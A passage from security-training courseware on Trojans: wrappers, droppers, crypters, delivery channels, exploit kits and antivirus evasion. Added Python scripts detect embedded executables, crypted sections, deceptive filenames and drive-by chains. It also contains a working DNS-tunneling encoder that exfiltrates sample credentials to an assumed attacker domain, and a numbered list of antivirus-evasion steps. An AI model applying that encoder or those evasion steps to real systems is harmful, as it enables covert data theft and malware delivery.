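        # SizeOfRawData and PointerToRawData sit at offsets 16 and 20 of each 40-byte header.
        raw_size, raw_ptr = struct.unpack_from("<II", data, first_section + 40 * i + 16)
        end = max(end, raw_ptr + raw_size)
    return end


def entropy(data):
    counts = Counter(data)
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def analyze_overlay(data):
    overlay = data[end_of_sections(data):]
    return {
        "overlay_bytes": len(overlay),
        "embedded_pe": overlay[:2] == b"MZ",          # a second executable was appended
        "entropy": round(entropy(overlay), 2) if overlay else 0.0,  # near 8.0: packed/encrypted
    }


if __name__ == "__main__":
    clean = build_minimal_pe(b"constructed clean program body")
    wrapped = clean + build_minimal_pe(b"constructed second program appended by a wrapper")
    print(analyze_overlay(clean))
    print(analyze_overlay(wrapped))
```

Legitimate installers and Authenticode-signed binaries also carry overlays (the signature itself lives past the sections), so the result is a triage signal to be read together with the file's security directory and signature, not a verdict on its own. An embedded MZ header or an 8-bit entropy close to 8.0 in an unsigned file is what moves it to the top of the pile.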

Figure 7.23: Diagram showing the complete process involved in infecting a target machine using a Trojan
Creating a Trojan

• Trojan Horse Construction Kits help attackers construct Trojan horses of their choice.
• DarkHorse Trojan Virus Maker creates user-specified Trojans by selecting from various options.
• The tools in these kits can be dangerous and can backfire if not properly executed.

Creating a Trojan

Attackers can create Trojans using various Trojan horse construction kits such as DarkHorse Trojan Virus Maker, and Senna Spy Trojan Generator.

Trojan Horse Construction Kit

Trojan horse construction kits help attackers construct Trojan horses and customize them according to their needs. These tools are dangerous and can backfire if not properly executed. New Trojans created by attackers remain undetected when scanned by virus- or Trojan-scanning tools, as they do not match any known signatures. This added benefit allows attackers to succeed in launching attacks.

• DarkHorse Trojan Virus Maker

DarkHorse Trojan Virus Maker is used to create user-specified Trojans via selection from a variety of available options. The Trojans are created to act according to these selected options. For example, if you choose the option Disable Process, the Trojan disables all processes on the target system. The figure below shows a snapshot of DarkHorse Trojan Virus Maker with its various available options.

Figure 7.24: Screenshot of DarkHorse Trojan Virus Maker 1.2

Some additional Trojan horse construction kits are as follows:
- Trojan Horse Construction Kit
- Senna Spy Trojan Generator
- Batch Trojan Generator
- Umbra Loader - Botnet Trojan Maker

Employing a Dropper or Downloader

After constructing their intended Trojans, attackers can employ a dropper or a downloader to transmit the Trojan package to the victim's machine.

Droppers

Droppers are programs that are used to camouflage malware payloads that can impede the functioning of the target system. The dropper consists of one or more types of malware features that can make it undetectable by antivirus software; moreover, the installation process can be stealthily performed.

The dropper is executed by simply loading its own code into the memory, and the malware payload is then extracted and written into the file system. Next, the malware installation process is initiated, and the payload is executed.

Emotet and Dridex are well-known droppers that attackers employ for deploying malware on the target machine.

Downloaders

A downloader is a program that can download and install harmful programs such as malware. Downloaders are similar to droppers to a certain extent. However, the main difference is that a downloader does not carry malware itself, whereas a dropper does; hence, it is possible for a new unknown downloader to pass through the anti-malware scanner.

Attackers use downloaders as part of the payload or other harmful programs that can drop and stealthily install the malware. Downloaders are spread as camouflaged files attached in emails, and the attached programs pose as legitimate programs such as accounts.exe or invoices. When the victim opens the attached infected file, the downloader tries to contact the remote server for directly fetching other malicious programs.

Godzilla downloader, W97M.Downloader!gen36, Trojan.Downloader, and JS.Downloader!gen277 are some well-known downloaders that attackers employ for deploying malware on the target machine.

Employing a Wrapper

Wrappers bind the Trojan executable with .EXE applications that appear genuine, such as games or office applications. When the user runs the wrapped .EXE application, it first installs the Trojan in the background and then runs the wrapping application in the foreground. The attacker can compress any (DOS/WIN) binary with tools such as petite.exe. This tool decompresses an EXE file (once compressed) at run time. Thus, it is possible for the Trojan to get in virtually undetected, as the packed file on disk no longer contains the byte sequences that signature-based antivirus software looks for. (Modern scanners ship unpackers for common packers, so this defeats only naive signature matching; emulation or a scan at run time still sees the decompressed code.)

The attacker can also place several executables inside one executable. These wrappers may also support functions such as running one file in the background and another one on the desktop. Technically speaking, wrappers are a type of "glueware" used to bind other software components together. A wrapper encapsulates several components into a single data source to make it usable in a more convenient manner compared to the original unwrapped source.

The lure of free software can trick users into installing Trojan horses. For instance, a Trojan horse might arrive in an email described as a computer calculator. When the user receives the email, the description of the calculator may lead him/her to install it. Although it may, in fact, be a working calculator, once the user installs the application file, the Trojan is installed in the background and it will perform other actions that are not readily apparent to the user, such as deleting files or emailing sensitive information to the attacker. In another instance, an attacker sends a birthday greeting that will install a Trojan as the user watches, e.g., a birthday cake dancing across the screen.

Covert Wrapper Programs

IExpress Wizard

IExpress Wizard is a wrapper program that guides the user to create a self-extracting package that can automatically install the embedded setup files, Trojans, etc. IExpress can remove the setup files after execution and thus erase traces of Trojans. Then, it can run a program or only extract hidden files. Such embedded Trojans may escape detection by antivirus software that does not unpack the self-extracting package before scanning it.

Figure 7.26: Screenshot of IExpress Wizard

Some additional wrapper tools are as follows:
- EliteWrap
- Advanced File Joiner
- Soprano
- Exe2vbs
- Kriptomatik
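The dropper and wrapper sections above describe binaries that carry one or more further executables inside a carrier program. The following Python script is added here as an illustration; it is not part of the original courseware and not code from any of the tools named above. It performs the check an analyst runs on a suspected wrapped or dropper file: it carves every Windows PE image out of a byte string by validating the MZ/PE header relationship (e_lfanew at offset 0x3C must point at the 'PE\0\0' signature). The carrier, DLL, and EXE stubs it scans are constructed inside the script and are header-only, not runnable programs.

```python
"""Scan a file image for embedded Windows executables.

Wrappers, binders, and droppers glue one or more PE images onto a carrier
executable. Each PE image starts with an 'MZ' DOS header whose e_lfanew field
(offset 0x3C) points at the 'PE\0\0' signature, so scanning for every 'MZ'
that satisfies that relation finds the carried payloads.
"""
import struct

IMAGE_FILE_DLL = 0x2000
MACHINE_NAMES = {0x14C: "x86", 0x8664: "x64", 0xAA64: "arm64"}


def find_embedded_pe(data: bytes) -> list:
    """Return [(offset, machine, is_dll)] for every valid PE image found in data."""
    found = []
    pos = data.find(b"MZ")
    while pos != -1:
        # The DOS header is 64 bytes; e_lfanew lives at its offset 0x3C.
        if pos + 0x40 <= len(data):
            e_lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
            pe = pos + e_lfanew
            # Heuristic sanity bound on e_lfanew; 'PE\0\0' plus a 20-byte COFF header must fit.
            if 0x40 <= e_lfanew < 0x1000 and pe + 24 <= len(data) and data[pe:pe + 4] == b"PE\0\0":
                machine = struct.unpack_from("<H", data, pe + 4)[0]
                characteristics = struct.unpack_from("<H", data, pe + 22)[0]
                found.append((pos, MACHINE_NAMES.get(machine, hex(machine)),
                              bool(characteristics & IMAGE_FILE_DLL)))
        pos = data.find(b"MZ", pos + 1)
    return found


def build_stub_pe(machine: int, characteristics: int) -> bytes:
    """Construct a minimal, non-runnable PE header image for the demo."""
    dos = bytearray(b"MZ" + b"\0" * 62)
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew: right after the DOS header
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 0, characteristics)
    return bytes(dos) + b"PE\0\0" + coff


# Constructed sample: a carrier "game" with a DLL and an x64 EXE bound onto the end.
# The stray "MZ" in the junk is there to show the e_lfanew validation rejecting it.
CARRIER = build_stub_pe(0x14C, 0x0102) + b"\x90" * 200
PAYLOAD_DLL = build_stub_pe(0x14C, 0x2102)
PAYLOAD_EXE = build_stub_pe(0x8664, 0x0022)
BOUND = CARRIER + b"junk MZ junk" + PAYLOAD_DLL + PAYLOAD_EXE

if __name__ == "__main__":
    for off, machine, is_dll in find_embedded_pe(BOUND):
        print(f"PE at offset {off:#06x}: {machine} {'DLL' if is_dll else 'EXE'}")
```

On a real sample, read the file with open(path, "rb").read() and pass it to find_embedded_pe; anything reported beyond offset 0 is a candidate payload to carve out and analyze separately.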

Employing a Crypter

A crypter is software that encrypts the original binary code of the .exe file. Attackers use crypters to hide viruses, spyware, keyloggers, RATs, etc., to make them undetectable by antivirus software. The crypter's output consists of the encrypted original program plus a small stub that decrypts it and runs it in memory at run time, so the malicious code never appears in clear on disk. Some crypters that one can use to prevent malicious programs from being detected by security mechanisms are as follows.

BitCrypter
Source: https://www.crypter.com

BitCrypter can be used to encrypt and compress 32-bit executables and .NET apps without affecting their direct functionality. A Trojan or malicious software piece can be encrypted into legitimate software to bypass firewalls and antivirus software. BitCrypter supports a wide range of OSs, from Windows XP to the latest Windows 10.

Figure 7.27: Screenshot of BitCrypter

Some additional crypter tools are as follows:
- SwayzCryptor
- Hidden Sight Crypter
- AegisCrypter v1.5
- Battleship Crypter
- Heavens Crypter
- Cypherx
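Crypters leave the original code as ciphertext inside the output file, next to a stub that needs somewhere to unpack it. The following Python example is added here for illustration; it is not taken from the page, nor from BitCrypter or any other crypter. It shows the two static indicators an analyst checks for in a suspected crypted sample: sections whose byte entropy is close to 8 bits per byte, and sections mapped both writable and executable. The minimal PE image it inspects is constructed inside the script; the entropy threshold of 7.0 is the author's choice and the section flags are the standard PE constants.

```python
"""Flag crypted or packed sections in a PE file by entropy and permissions.

A crypter stores the original executable as ciphertext and prepends a stub that
decrypts it in memory at run time. The ciphertext looks like random data
(Shannon entropy near 8 bits/byte), and the stub usually needs a section that is
both writable and executable to unpack into. Both are cheap static indicators.
"""
import math
import random
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(buf: bytes) -> float:
    """Bits of entropy per byte of buf (0.0 for empty input)."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_sections(data: bytes):
    """Yield (name, raw_bytes, characteristics) for each section of a PE image."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsect = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size                      # section table follows the optional header
    for i in range(nsect):
        hdr = table + 40 * i                               # each IMAGE_SECTION_HEADER is 40 bytes
        name = data[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", data, hdr + 16)
        flags = struct.unpack_from("<I", data, hdr + 36)[0]
        yield name, data[raw_ptr:raw_ptr + raw_size], flags


def suspicious_sections(data: bytes, threshold: float = 7.0) -> dict:
    """Return {name: (entropy, reasons)} for sections that look crypted or packed."""
    report = {}
    for name, raw, flags in pe_sections(data):
        reasons = []
        ent = shannon_entropy(raw)
        if ent >= threshold:
            reasons.append("high entropy")
        if flags & IMAGE_SCN_MEM_WRITE and flags & IMAGE_SCN_MEM_EXECUTE:
            reasons.append("writable+executable")
        if reasons:
            report[name] = (round(ent, 2), reasons)
    return report


def build_sample_pe(sections) -> bytes:
    """Construct a minimal PE with the given [(name, bytes, flags)] for the demo."""
    opt_size = 0                                           # no optional header needed for the demo
    out = bytearray(b"MZ" + b"\0" * 62)
    struct.pack_into("<I", out, 0x3C, 0x40)
    out += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    offset = 0x40 + 24 + opt_size + 40 * len(sections)     # raw data starts after the headers
    body = b""
    for name, raw, flags in sections:
        out += name.encode().ljust(8, b"\0")
        out += struct.pack("<IIIIIIHHI", len(raw), 0, len(raw), offset, 0, 0, 0, 0, flags)
        body += raw
        offset += len(raw)
    return bytes(out) + body


# Constructed sample: a low-entropy code section plus a "crypted" section of
# seeded pseudo-random bytes mapped RWX, as a crypter stub would need.
_rng = random.Random(7)
CRYPTED = bytes(_rng.getrandbits(8) for _ in range(4096))
PLAIN = bytes(range(16)) * 256                             # exactly 4.0 bits/byte of entropy
SAMPLE = build_sample_pe([
    (".text", PLAIN, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".crypt", CRYPTED, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_READ),
])

if __name__ == "__main__":
    for name, (ent, why) in suspicious_sections(SAMPLE).items():
        print(f"{name}: entropy {ent}, {', '.join(why)}")
```

Compressed resources and embedded archives also score high on entropy, so treat the entropy hit as a reason to look closer (unpack, run under a debugger until the stub hands over control) rather than as a verdict on its own.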


Propagating and Deploying a Trojan

After creating a Trojan and employing a dropper/downloader, wrapper, and crypter, the attacker must transfer the package and deploy it on the target machine. The attacker can use the following techniques to propagate the Trojan package to the target machine:
- Deploy a Trojan through emails
- Deploy a Trojan through covert channels
- Deploy a Trojan through proxy servers
- Deploy a Trojan through USB/flash drives

Deploy a Trojan through Emails

A Trojan is the means by which an attacker can gain access to the victim's system. To gain control over the victim's machine, the attacker creates a Trojan server and then sends an email that lures the victim into clicking on a link provided within the email. As soon as the victim clicks the malicious link sent by the attacker, it connects directly to the Trojan server. The Trojan server then sends a Trojan to the victim system, which undergoes automatic installation on the victim's machine and infects it. As a result, the victim's device unknowingly establishes a connection with the attack server. Once the victim connects to the attacker's server, the attacker can take complete control of the victim's system and perform any action. If the victim carries out an online transaction or purchase, then the attacker can easily steal sensitive information such as the victim's credit card details and account information. In addition, the attacker can use the victim's machine to launch attacks on other systems.

The Trojan may infect computers when users open an email attachment that installs the Trojan on their computers, which might serve as a backdoor for criminals to access the system later.

Major Trojan Attack Paths

Figure 7.28: Propagating and deploying a Trojan through email

Deploy a Trojan through Covert Channels

"Overt" refers to something obvious, explicit, or evident, whereas "covert" refers to something concealed, secret, or hidden. An overt channel is a legal channel for the transfer of data or information in a company network, and it works securely to transfer data and information. On the contrary, a covert channel is an illegal, hidden path used to transfer data from a network.

The table below lists the primary differences between overt and covert channels:

Overt Channel:
- A legitimate communication path within a computer system or network for the transfer of data
- Its idle components can be exploited to create a covert channel

Covert Channel:
- A channel that transfers information within a computer system or network in a way that violates the security policy
- An example of a covert channel is the communication between a Trojan and its command-and-control center

Table 7.2: Comparison between the overt channel and covert channel

Covert channels are methods used by attackers to deploy and hide malicious Trojans in an undetectable protocol. They rely on a technique called tunneling, which enables one protocol to transmit over the other. This makes it an attractive mode of transmission for a Trojan, because an attacker can use the covert channel to install a backdoor on the target machine. Covert channels are mostly employed by attackers to evade antivirus scanners and firewalls deployed in the target network. Attackers can create covert channels using various tools such as GhostTunnel V2 and ELECTRICFISH (a North Korean tunneling tool). These tools enable attackers to create covert tunnels with protocols such as DNS, SSH, ICMP, and HTTP/S, to deploy Trojans and perform data exfiltration.

Figure 7.29: Propagating and deploying a Trojan through covert channels
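The covert channels described above are easiest to understand from both ends. The following Python example is added here for illustration; it is not code from the page, nor from GhostTunnel or ELECTRICFISH. It encodes a constructed secret into DNS query names under an assumed attacker-controlled domain (cdn-metrics.example), reassembles the data the way the attacker's authoritative name server would, and then scores a constructed query log with three cheap heuristics a defender can run over DNS logs: label length, label entropy, and the share of subdomains that are never looked up twice. The registrable domain is taken to be the last two labels, a simplification of the public suffix list.

```python
"""A DNS covert channel from both ends: the Trojan's encoder, the attacker's
decoder, and a detector over query logs.

DNS rides out through almost every firewall: the client encodes data into
subdomain labels of a domain whose authoritative server the attacker controls,
so each lookup carries a chunk outbound and the answer can carry data back.
"""
import base64
import math
from collections import defaultdict

MAX_LABEL = 63                      # RFC 1035 limit for a single DNS label
SEQ_WIDTH = 3                       # fixed-width chunk sequence number prefix


def encode_chunks(data: bytes, domain: str) -> list:
    """Trojan side: split data into base32 labels under the attacker's domain."""
    enc = base64.b32encode(data).decode().rstrip("=").lower()
    step = MAX_LABEL - SEQ_WIDTH
    return [f"{i // step:0{SEQ_WIDTH}d}{enc[i:i + step]}.{domain}"
            for i in range(0, len(enc), step)]


def decode_chunks(names, domain: str) -> bytes:
    """Attacker's authoritative server side: reorder by sequence number and decode."""
    suffix = "." + domain
    parts = sorted(n[:-len(suffix)] for n in names if n.endswith(suffix))
    enc = "".join(p[SEQ_WIDTH:] for p in parts).upper()
    return base64.b32decode(enc + "=" * (-len(enc) % 8))


def _entropy(s: str) -> float:
    if not s:
        return 0.0
    return -sum(s.count(c) / len(s) * math.log2(s.count(c) / len(s)) for c in set(s))


def score_queries(log_lines, min_queries: int = 5) -> dict:
    """Defender side: return {domain: reasons} for domains whose lookups look tunneled.

    log_lines are constructed '<client> <qname>' records; only the qname is used.
    The registrable domain is approximated by the last two labels.
    """
    per_domain = defaultdict(list)
    for line in log_lines:
        labels = line.split()[-1].rstrip(".").split(".")
        if len(labels) < 3:
            continue
        per_domain[".".join(labels[-2:])].append(".".join(labels[:-2]))
    findings = {}
    for domain, subs in per_domain.items():
        reasons = []
        if len(subs) >= min_queries and len(set(subs)) / len(subs) >= 0.9:
            reasons.append("many unique subdomains")      # no caching benefit, every name new
        if sum(len(s) for s in subs) / len(subs) > 30:
            reasons.append("long labels")
        if sum(_entropy(s) for s in subs) / len(subs) > 3.0:
            reasons.append("high-entropy labels")
        if len(reasons) >= 2:
            findings[domain] = reasons
    return findings


# Constructed sample: one infected host exfiltrates a credential file while two
# hosts do ordinary lookups against a legitimate domain.
EXFIL_DOMAIN = "cdn-metrics.example"          # assumed attacker-controlled domain
SECRET = b"user=alice\npass=Hunter2!\ntoken=3f9a1c77b0e4d2a5" * 4
TUNNEL_QUERIES = encode_chunks(SECRET, EXFIL_DOMAIN)
LOG = [f"10.0.0.7 {q}" for q in TUNNEL_QUERIES] + [
    "10.0.0.8 www.example.com",
    "10.0.0.8 mail.example.com",
    "10.0.0.9 www.example.com",
    "10.0.0.9 static.example.com",
    "10.0.0.9 api.example.com",
    "10.0.0.9 login.example.com",
]

if __name__ == "__main__":
    print(f"{len(TUNNEL_QUERIES)} queries carry {len(SECRET)} bytes")
    print(decode_chunks(TUNNEL_QUERIES, EXFIL_DOMAIN) == SECRET)
    print(score_queries(LOG))
```

Real tunneling tools add sequencing, acknowledgements, and a return path in TXT or NULL records, and a real detector should aggregate per client over time, but the encoder and the three scoring signals are the core of both.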
Deploy a Trojan through Proxy Servers

A Trojan proxy is usually a standalone application that allows remote attackers to use the victim's computer as a proxy to connect to the target machine. Attackers compromise several computers and start using them as hidden proxy servers. Attackers have full control over the proxy victim's system and can launch attacks on other systems in the affected user's network. Attackers use this strategy to anonymously propagate and deploy the Trojan on the target computer. If the authorities detect illegal activity, the footprints lead to innocent users and not to the attackers, potentially resulting in legal hassles for the victims, who are ostensibly responsible for their network or any attacks launched from them. Thousands of machines on the Internet are infected with proxy servers. Attackers can also employ proxy server Trojans such as Linux.Proxy.10, Proxy Trojan, or Pinkslipbot (Qbot), which can automatically create proxies and be used to perform malicious activities.

Figure 7.30: Propagating and deploying a Trojan through proxy servers
Deploy a Trojan through USB/Flash Drives

An attacker can also transfer the Trojan package onto a USB drive and trick the victim into using the USB drive on the target system. Sometimes, attackers just drop a USB drive and wait for a random victim to pick it up. Once the USB drive is picked up and inserted into the target system by the innocent victim, the Trojan is propagated on the system by the drop or download method, depending on the type of packaging technique used by the attacker. After propagating to the victim's machine, the Trojan is executed on the target system, thereby infecting and compromising the system and network. (Current versions of Windows do not AutoRun programs from removable media, so execution usually still depends on the victim opening the file or on the device posing as a keyboard and typing the commands itself.)

Figure 7.31: Propagating and deploying a Trojan through USB/flash drives

Techniques for Evading Antivirus Software

Sometimes, various types of antivirus scanners are deployed in the target network, and these antivirus scanners do not allow the propagation or deployment of random or malicious packages. Hence, propagating and deploying a Trojan stealthily is one of the important tasks of an attacker. The various techniques that can be used by attackers to make malware such as Trojans, viruses, and worms undetectable by antivirus applications are listed below.

1. Break the Trojan file into multiple pieces and zip them as a single file.
2. Always write your own Trojan and embed it into an application (an antivirus program fails to recognize new Trojans, as its database does not contain the proper signatures).
3. Change the Trojan's syntax:
   - Convert an EXE to VBScript
   - Change the .EXE extension to .DOC.EXE, .PPT.EXE, or .PDF.EXE (Windows hides "known extensions" by default; hence, the file shows up only as .DOC, .PPT, .PDF, etc.)
4. Change the content of the Trojan using a hex editor, and also change the checksum and encrypt the file.
5. Never use Trojans downloaded from the web (antivirus software detects these easily).
6. Use binder and splitter tools that can change the first few bytes of the Trojan program.
7. Perform code obfuscation or morphing. Morphing is done to prevent the antivirus program from differentiating between malicious and harmless programs.
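Item 3 above relies on Windows hiding known extensions. The following Python check is added here as an illustration and is not part of the page; it recovers the extension the operating system will actually act on and flags names built to mislead. It goes beyond the page's .DOC.EXE case by also catching the Unicode right-to-left override character (U+202E, which makes "photo<U+202E>gpj.exe" display as "photoexe.jpg") and whitespace padding before the real extension. The extension lists are the author's assumptions, not anything taken from the page.

```python
"""Detect the 'hidden extension' trick used to pass a Trojan off as a document.

Explorer hides known extensions by default, so 'invoice.pdf.exe' is shown as
'invoice.pdf'. This recovers the extension that decides how the file executes
and reports why a name looks deceptive.
"""
import unicodedata

# Assumed lists for the example; extend them for your environment.
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "vbs", "vbe",
                   "js", "jse", "wsf", "wsh", "ps1", "hta", "msi", "lnk", "dll"}
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt",
                 "jpg", "jpeg", "png", "gif", "mp3", "mp4", "zip"}
RTLO = "\u202e"                                  # RIGHT-TO-LEFT OVERRIDE


def real_extension(name: str) -> str:
    """Extension the OS acts on, after stripping paths, the RTLO trick, and padding."""
    cleaned = name.replace(RTLO, "")
    base = cleaned.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    parts = base.lower().split(".")
    return parts[-1].strip() if len(parts) > 1 else ""


def check_filename(name: str):
    """Return (is_deceptive, reasons) for a filename or path."""
    reasons = []
    ext = real_extension(name)
    visible = name.replace(RTLO, "")
    # Every dot-separated piece before the real extension, normalized.
    stem_parts = [p.strip() for p in visible.lower().split(".")[:-1]]
    if RTLO in name:
        reasons.append("right-to-left override in name")
    if ext in EXECUTABLE_EXTS and any(p in DOCUMENT_EXTS for p in stem_parts):
        reasons.append(f"document extension hides executable .{ext}")
    if ext in EXECUTABLE_EXTS and visible.rsplit(".", 1)[0].endswith((" ", "\t")):
        reasons.append("whitespace padding before executable extension")
    if any(unicodedata.category(c) == "Cf" for c in name if c != RTLO):
        reasons.append("other invisible format characters in name")
    return bool(reasons), reasons


if __name__ == "__main__":
    for sample in ("invoice.pdf.exe", "report.docx", "Invoice.PDF   .exe",
                   "photo" + RTLO + "gpj.exe", "setup.exe"):
        print(repr(sample), check_filename(sample))
```

This is a name-level check only; it says nothing about the file's contents, so pair it with a content check (for example, confirming that a claimed PDF actually starts with %PDF) on a mail gateway or download scanner.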

Exploit Kits

An exploit kit or crimeware toolkit is used to exploit security loopholes found in software applications such as Adobe Reader and Adobe Flash Player, by distributing malware such as spyware, viruses, Trojans, worms, bots, backdoors, buffer overflow scripts, or other payloads to the target system. Exploit kits come with pre-written exploit code. Thus, they are easy to use for an attacker who is not an IT or security expert. They also provide a user-friendly interface to track the infection statistics as well as a remote mechanism to control the compromised system. Using exploit kits, an attacker can target browsers, programs that are accessible through browsers, and zero-day vulnerabilities, and the kits are promptly updated with new exploits as patches are released. Exploit kits are used against users running insecure or outdated software applications on their systems.

Figure 7.32: General procedure of an exploit kit

The diagram above shows the general procedure for an exploit kit; the process of exploiting a machine might vary depending on the exploit kit used.
- The victim visits a legitimate website that is hosted on the compromised web server.
- The victim is redirected through various intermediary servers.
- The victim unknowingly lands on an exploit kit server hosting the exploit pack landing page.
- The exploit kit gathers information on the victim, based on which it determines the exploit and delivers it to the victim's system.
- If the exploit succeeds, a malware program is downloaded and executed on the victim's system.
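The five-step flow above leaves a trail in web proxy logs: the client hops through several domains by way of redirects and ends at a payload fetched from a host it never visited on its own. The following Python example is added here and is not part of the page or of any exploit kit. It reconstructs that trail per client by walking backwards from each fetched payload (executable, Flash, Java, or Silverlight object) through redirect responses and Referer links, and flags chains that cross several domains. The log format and the records are constructed for the example; a real proxy log needs its own parser, and the 3xx handling is a simplification (a browser keeps the original Referer across a redirect, which is why redirect hops are accepted by status rather than by Referer).

```python
"""Reconstruct drive-by redirect chains from web proxy logs.

An exploit kit visit looks like: legitimate page -> one or more 302 redirectors
-> landing page -> exploit object -> payload download, all from one client
within seconds. This walks that chain backwards from each payload fetch.
"""
from collections import defaultdict
from urllib.parse import urlparse

PAYLOAD_EXTS = (".exe", ".dll", ".swf", ".jar", ".xap")
REDIRECT_CODES = {301, 302, 303, 307, 308}


def parse_line(line: str) -> dict:
    """Constructed format: '<ts> <client> <status> <method> <url> <referer>'."""
    ts, client, status, method, url, referer = line.split()
    return {"ts": float(ts), "client": client, "status": int(status),
            "method": method, "url": url, "referer": referer}


def host(url: str) -> str:
    return urlparse(url).netloc.lower()


def chain_for(recs: list, idx: int, max_gap: float) -> list:
    """Walk back from recs[idx] through Referer links and redirect hops."""
    chain = [recs[idx]["url"]]
    cur = recs[idx]
    for prev in reversed(recs[:idx]):
        if cur["ts"] - prev["ts"] > max_gap:
            break                                  # too old to belong to this visit
        linked = prev["url"] == cur["referer"] or prev["status"] in REDIRECT_CODES
        if linked:                                 # sibling fetches (css, images) are skipped
            chain.insert(0, prev["url"])
            cur = prev
    return chain


def find_driveby_chains(lines, max_gap: float = 30.0, min_hosts: int = 3) -> dict:
    """Return {client: chain} where a payload fetch ends a multi-domain redirect chain."""
    by_client = defaultdict(list)
    for rec in map(parse_line, lines):
        by_client[rec["client"]].append(rec)
    findings = {}
    for client, recs in by_client.items():
        recs.sort(key=lambda r: r["ts"])
        for i, rec in enumerate(recs):
            if rec["status"] != 200 or not urlparse(rec["url"]).path.lower().endswith(PAYLOAD_EXTS):
                continue
            chain = chain_for(recs, i, max_gap)
            if len({host(u) for u in chain}) >= min_hosts:
                findings[client] = chain           # a later payload fetch replaces an earlier one
    return findings


# Constructed records: client .5 is driven through an ad redirector and a rotator
# gate to a landing page that serves a Flash exploit and then the payload;
# client .6 downloads an installer directly from a vendor page.
LOG = [
    "100.0 10.1.1.5 200 GET http://news.example/story.html -",
    "100.4 10.1.1.5 200 GET http://news.example/style.css http://news.example/story.html",
    "100.9 10.1.1.5 302 GET http://ads.tracker.example/click?id=7 http://news.example/story.html",
    "101.2 10.1.1.5 302 GET http://gate.rotator.example/r/9x http://news.example/story.html",
    "101.8 10.1.1.5 200 GET http://land.ek.example/index.php?q=a1 http://news.example/story.html",
    "102.3 10.1.1.5 200 GET http://land.ek.example/flash.swf http://land.ek.example/index.php?q=a1",
    "103.0 10.1.1.5 200 GET http://land.ek.example/payload.exe http://land.ek.example/index.php?q=a1",
    "150.0 10.1.1.6 200 GET http://vendor.example/download.html -",
    "151.0 10.1.1.6 200 GET http://vendor.example/setup.exe http://vendor.example/download.html",
]

if __name__ == "__main__":
    for client, chain in find_driveby_chains(LOG).items():
        print(client)
        for url in chain:
            print("   ", url)
```

Two things the chain gives an incident responder immediately: the compromised legitimate site at its head (which other users visited it?) and the landing host near its tail (block it, and search for every other client that reached it).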
Exploit Kits

RIG Exploit Kit

The RIG exploit kit is one of the most popular exploit kits in recent years, with its wide range of malware distribution. RIG EK was first discovered in 2014. It is efficient in distributing many exploits. RIG EK was used successfully by attackers in distributing Cryptobit, CryptoLuck, CryptoShield, CryptoDefense, Sage, Spora, Revenge, PyCL, Matrix, Philadelphia, and Princess ransomware. It was also involved in distributing LatentBot, Pony, and Ramnit Trojans. Furthermore, RIG was involved in delivering the famous banking Trojan Zeus. The latest version of the RIG exploit kit takes advantage of outdated versions of applications such as Flash, Java, Silverlight, Internet Explorer, or Microsoft Edge to distribute the Cerber ransomware.

Features of the RIG exploit kit:
- Landing page based on a standard 302 redirect
- Domain auto-rotator to avoid blacklisting and detection
- FUD (fully undetectable) exploits
- Combination of different web technologies, such as DoSWF, JavaScript, Flash, and VBScript, to obfuscate the attack

The RIG exploit kit is supported for different browsers as well as the following CVEs:

CVE-2018-4878: Adobe Flash Player Use-After-Free Vulnerability
CVE-2018-8174: Windows VBScript Engine Remote Code Execution Vulnerability
CVE-2013-2551: Microsoft Internet Explorer Use-After-Free Remote Code Execution Vulnerability
CVE-2014-0322: Microsoft Internet Explorer Use-After-Free Remote Code Execution Vulnerability
CVE-2014-0497: Adobe Flash Player Remote Code Execution Vulnerability
CVE-2013-0074: Microsoft Silverlight Double Dereference Remote Code Execution Vulnerability
CVE-2013-2465: Oracle Java SE Memory Corruption Vulnerability
CVE-2012-0507: Oracle Java SE Remote Java Runtime Environment Code Execution Vulnerability
CVE-2014-6332: Windows OLE Automation Array Remote Code Execution Vulnerability
CVE-2015-2419: JScript9 Memory Corruption Vulnerability
CVE-2016-0189: Scripting Engine Memory Corruption Vulnerability
CVE-2015-8651: Integer Overflow Vulnerability in Adobe Flash Player

Figure 7.33: Screenshot of RIG Exploit Kit (Statistics panel)

Some additional exploit kits that attackers can use to propagate and deploy Trojans are as follows:
- Magnitude
- Angler
- Neutrino
- Terror
- Sundown

Module Flow: Malware Concepts; Trojan Concepts; Virus and Worm Concepts; Fileless Malware Concepts; Malware Analysis; Countermeasures; Anti-Malware Software

Virus and Worm Concepts

This section introduces you to various concepts related to viruses and worms. In addition, it discusses the life stages of a virus and the working of a virus. It also explores why people create computer viruses, indications of a virus attack, virus hoaxes, fake antivirus tools, and ransomware.

Furthermore, it highlights different types of viruses, categorized by their origin, techniques used to infect target systems, the types of files they infect, where they hide, the sort of damage they cause, the type of OS they work on, and so on. It also deals with computer worms, discusses the difference between worms and viruses, and explores worm makers.

Introduction to Viruses

Viruses are the scourge of modern computing. Computer viruses have the potential to wreak havoc on both business and personal computers. The lifetime of a virus depends on its ability to reproduce itself. Therefore, attackers design every virus code such that the virus replicates itself n times.

